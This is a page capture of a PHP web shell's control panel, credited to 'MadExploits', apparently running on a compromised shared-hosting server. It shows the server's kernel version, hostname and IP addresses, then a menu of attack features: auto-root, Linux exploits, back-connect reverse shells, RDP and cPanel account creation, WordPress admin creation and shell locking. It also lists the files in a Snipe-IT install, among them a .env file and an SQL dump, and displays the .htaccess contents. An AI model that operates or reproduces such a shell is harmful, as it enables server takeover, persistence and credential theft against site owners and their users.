Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
snipeit /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
6
KB
-rw-r--r--
.htaccess
536
B
-rw-r--r--
clone.php
9.91
KB
-rw-r--r--
edit.php
4.65
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
9.98
KB
-rw-r--r--
fileindex.php
821
B
-rw-r--r--
import.php
3.08
KB
-rw-r--r--
info.xml
4.87
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
4.72
KB
-rw-r--r--
install.xml
4.04
KB
-rw-r--r--
md5
1.27
KB
-rw-r--r--
notes.txt
1.15
KB
-rw-r--r--
snipeit.sql
88.54
KB
-rw-r--r--
snipeit.zip
52.92
MB
-rw-r--r--
update_pass.php
554
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
<IfModule mod_rewrite.c> <IfModule mod_negotiation.c> Options -MultiViews </IfModule> # Make sure .env files not not browseable if in a sub-directory. <FilesMatch "\.env$"> # Apache 2.2 <IfModule !authz_core_module> Deny from all </IfModule> # Apache 2.4+ <IfModule authz_core_module> Require all denied </IfModule> </FilesMatch> </IfModule> <IfModule mod_alias.c> RedirectMatch 301 ^[[relativeurl]]/$ [[softurl]]/public </IfModule>
Close